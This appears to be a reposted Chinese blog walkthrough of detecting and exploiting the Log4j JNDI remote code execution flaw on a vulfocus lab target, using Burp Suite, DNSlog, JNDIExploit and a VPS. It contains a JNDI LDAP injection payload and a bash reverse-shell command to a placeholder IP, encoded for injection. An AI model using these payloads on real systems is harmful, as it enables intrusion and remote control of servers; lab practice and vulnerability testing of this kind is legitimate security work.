Log4j 远程代码执行漏洞检测

阅读: 评论:0

Log4j 远程代码执行漏洞检测

Log4j 远程代码执行漏洞检测

所需资源

靶场使用vulfocus的靶场,该靶场漏洞位置存在于/hello路径,漏洞验证过程使用burpsuite、JNDIExploit以及拥有公网ip的vps的服务器。

靶场


Dnslog


Log4j工具检测

工具关注公众号“李白你好”回复“log4j”获取

dnslog上的记录查看是否执行请求。

手工检测

payload=${jndi:ldap:///exp}



说明漏洞存在。

命令执行

首先将payload进行base64编码(注意 在注入中 需要将base64加密后的+进行url编码 ,burpsuite需要二次url编码)。

bash -i >& /dev/tcp/X.X.X.X:10000 0>&1


使用靶机可远程访问的服务器,开启能够执行恶意命令的ldap服务器,这里使用JNDIExploit,JNDIExploit具体使用参数如下图。

.md

本文发布于:2024-01-30 14:24:33,感谢您对本站的认可!

本文链接:https://www.4u4v.net/it/170659587720635.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

标签:漏洞   代码   Log4j
留言与评论(共有 0 条评论)
   
验证码:

Copyright ©2019-2022 Comsenz Inc.Powered by ©

网站地图1 网站地图2 网站地图3 网站地图4 网站地图5 网站地图6 网站地图7 网站地图8 网站地图9 网站地图10 网站地图11 网站地图12 网站地图13 网站地图14 网站地图15 网站地图16 网站地图17 网站地图18 网站地图19 网站地图20 网站地图21 网站地图22/a> 网站地图23